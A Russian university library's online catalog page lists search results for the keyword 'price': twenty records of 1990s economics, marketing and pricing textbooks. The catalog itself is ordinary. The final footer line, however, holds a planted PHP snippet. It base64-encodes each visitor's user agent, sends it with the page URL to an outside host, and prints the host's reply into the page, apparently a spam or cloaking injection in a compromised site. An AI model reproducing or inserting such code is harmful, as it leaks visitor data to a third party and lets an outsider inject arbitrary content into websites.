Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

67 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ЦЕНА")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 1383
1. 
Основы внешнеэкономической деятельности [Текст] : программа дисциплины и пл. практ. занятий / ОмГТУ, 1997. - 20 с.
Держатели документа (Информация об экземплярах) 
2. 
Пунин, Евгений Иванович. Маркетинг, менеджмент и ценообразование на предприятиях (в условиях рыночной экономики) [Текст] / Е. И. Пунин; Э. Е. Обминский, 1993. - 111 с.
3. 
Промышленность России [Текст] : Стат. сб. / Редколл.: В. В. Далин и др., 1996. - 425 с.
Держатели документа (Информация об экземплярах) 
4. 
Макконнелл, Кэмпбелл Р.Экономикс [Текст] : Принципы, проблемы и политика: В 2 т.: Пер. с англ. Т. 2, 1996. - 400 с.
Держатели документа (Информация об экземплярах) 
5. 
Ильенкова, Наталья Дмитриевна. Спрос: анализ и управление [Текст] : Учеб. пособие для экон. специальностей вузов / Н. Д. Ильенкова; И. К. Беляевский, 1997. - 160 с.
6. 
Цацулин, Александр Николаевич. Ценообразование в системе маркетинга [Текст] / А. Н. Цацулин, 1997. - 295 с.
Держатели документа (Информация об экземплярах) 
7. 
Моришима, Мичио. Равновесие, устойчивость, рост [Текст] : Многоотраслевой анализ / М. Моришима, 1972. - 279 с.
Держатели документа (Информация об экземплярах) 
8. 
Основы теории переходной экономики (вводный курс) [Текст] : Учеб. пособие для вузов по направлению "Экономика" / В. А. Амвросов, А. Н. Голиков, Ивашковский; Е. А. Киселева, М. Н. Чепурин, 1996. - 319 с.
9. 
Кимбол, Боб. Торговля. Секреты успеха [Текст] / Б. Кимбол; О. Максименко, 1997. - 221 с.
10. 
Основы предпринимательского дела [Текст] : Благород. бизнес: Учеб. для вузов по направлениям "Экономика" и "Менеджмент" / В. А. Анташов, В. Г. Варшамова, Е. С. Зотова; Ю. М. Осипов, Е. Е. Смирнова, 1996. - 459 с.
Держатели документа (Информация об экземплярах) 
11. 
Рузавин, Георгий Иванович. Основы рыночной экономики [Текст] : Учеб. пособие для студентов экон. специальностей вузов / Г. И. Рузавин, 1996. - 423 с.
Держатели документа (Информация об экземплярах) 
12. 
Маркетинг [Текст] : Для студентов эконом. специальностей вузов: Пер. с англ., 1994. - 67 с.
Держатели документа (Информация об экземплярах) 
13. 
Ойкен, Вальтер. Основные принципы экономической политики [Текст] / В. Ойкен; Пер. Л. А. Козлов, Пер. Ю. И. Куколев, Ред. Л. И. Цедилин, Ред. К. Херрманн-Пиллат, 1995. - 494 с.
Держатели документа (Информация об экземплярах) 
14. 
Панкрухин А. П. Маркетинг образовательных услуг в высшем и дополнительном образовании [Текст] : Учеб. пособие для студентов экон. и пед. вузов и фак. / А. П. Панкрухин, 1995. - 239 с.
15. 
Организация розничной торговли [Текст] : Для студентов эконом. специальностей вузов: Пер. с англ., 1994. - 74 с.
Держатели документа (Информация об экземплярах) 
16. 
Менеджмент и рынок: германская модель [Текст] : Учеб. пособие.: Пер. с нем. / У. Рор, К. М. Барфус, Г. Дай; С. Долгов, 1995. - 459 с.
Держатели документа (Информация об экземплярах) 
17. 
Экономика предприятия [Текст] : Учеб. пособие для студентов вузов по специальности произв. менеджмент / В. М. Семенов, И. Д. Баев, С. А. Терехова, 1996. - 177 с.
Держатели документа (Информация об экземплярах) 
18. 
Маркетинг [Текст] : Учеб. для вузов, по специальностям "Маркетинг" и "Менеджмент" / А. Н. Романов, Ю. Ю. Корлюгов, С. А. Красильников, 1996. - 558 с.
Ключевые слова 
Маркетинг -- Рынок -- Товар -- Цена -- Ценообразование -- Ценовая политика -- Предприятие -- Спрос -- Сбыт -- Биржевая деятельность -- СЕГМЕНТАЦИЯ -- ИЗУЧЕНИЕ -- ПОТРЕБИТЕЛЕЙ -- ОБЕСПЕЧЕНИЕ -- КАЧЕСТВА -- КОНКУРЕНТОСПОСОБНОСТИ -- СЕРВИС -- РЕАЛИЗАЦИЯ -- КОММУНИКАЦИИ -- РЕКЛАМА -- паблик -- рилейшнз -- ЦЕНЫ -- ЦЕНООБРАЗОВАНИЕ -- КОНТРОЛЬ -- БИЗНЕС-ПЛАН ПРЕДПРИЯТИЯ -- МЕЖДУНАРОДНЫЙ МАРКЕТИНГ -- БИРЖЕВАЯ ДЕЯТЕЛЬНОСТЬ -- БАНКОВСКИЙ МАРКЕТИНГ -- ИНФОРМАЦИОННЫЕ ТЕХНОЛОГИИ В МАРКЕТИНГЕ
19. 
Ценообразование [Текст] : Учеб. для вузов: Пер. с англ., 1994. - 50 с.
Держатели документа (Информация об экземплярах) 
20. 
Дихтль, Ервин. Практический маркетинг [Текст] : Учеб. пособие / Е. Дихтль, Х. Хершген ; под ред. И. С. Минко ; пер. А. М. Макарова, 1995. - 255 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2995 - 22.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 2.05 с.12 запросов, 0.95c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;